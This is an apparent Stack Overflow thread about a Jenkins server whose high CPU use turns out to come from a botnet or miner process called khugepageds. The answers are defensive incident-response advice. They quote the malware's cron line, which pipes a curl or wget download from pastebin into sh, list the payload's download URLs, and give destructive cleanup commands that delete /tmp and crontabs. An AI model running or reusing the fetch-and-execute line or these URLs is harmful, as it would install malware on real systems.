user3052526
user3052526

Reputation: 681

Jenkins High CPU Usage Khugepageds

enter image description here

So the picture above shows a command khugepageds that is using 98 to 100 % of CPU at times.

I tried finding how does jenkins use this command or what to do about it but was not successful.

I did the following

When i pkill ofcourse the usage goes down but once restart its back up again.

Anyone had this issue before?

Upvotes: 19

Views: 7750

Answers (6)

FkJ
FkJ

Reputation: 1634

In my case this was making builds fail randomly with the following error:

Maven JVM terminated unexpectedly with exit code 137

It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.

Problem was solved with @HeffZilla solution.

Upvotes: 0

This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

Possible solution

  1. Do not run Confluence as root!
  2. Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
  3. Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
  4. Remove broken crontab: crontab -u <confluence_user> -r
  5. Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
    location /rest/tinymce/1/macro/preview {
        return 403;
    }
  1. Restart Confluence.

The exploit

Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg

The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.

The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I haven't still examined what it does. Looks like a botnet controller.

Upvotes: 10

HeffZilla
HeffZilla

Reputation: 306

So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill to process (and keep it killed) by running the following command...

rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;

Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.

NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).

Upvotes: 19

Tony
Tony

Reputation: 1

A solution that works, because the cron file just gets recreated is to empty jenkins' cronfile, I also changed the ownership, and also made the file immutable.

This finally stopped this process from kicking in..

Upvotes: 0

MalhotraVijay
MalhotraVijay

Reputation: 101

Yes, we were also hit by this vulnerability, thanks to pittss's we were able to detect a bit more about that.

You should check the /var/logs/syslogs for the curl pastebin script which seems to start a corn process on the system, it will try to again escalated access to /tmp folder and install unwanted packages/script.

You should remove everything from the /tmp folder, stop jenkins, check cron process and remove the ones that seem suspicious, restart the VM.

Since the above vulnerability adds unwanted executable at /tmp foler and it tries to access the VM via ssh. This vulnerability also added a cron process on your system beware to remove that as well.

Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.

Hope this helps.

Upvotes: 10

pittss
pittss

Reputation: 61

it seem like vulnerability. try look syslog (/var/log/syslog, not jenkinks log) about like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).

If that, try stop jenkins, clear /tmp dir and kill all pids started with jenkins user.

After if cpu usage down, try update to last tls version of jenkins. Next after start jenkins update all plugins in jenkins.

Upvotes: 6

Related Questions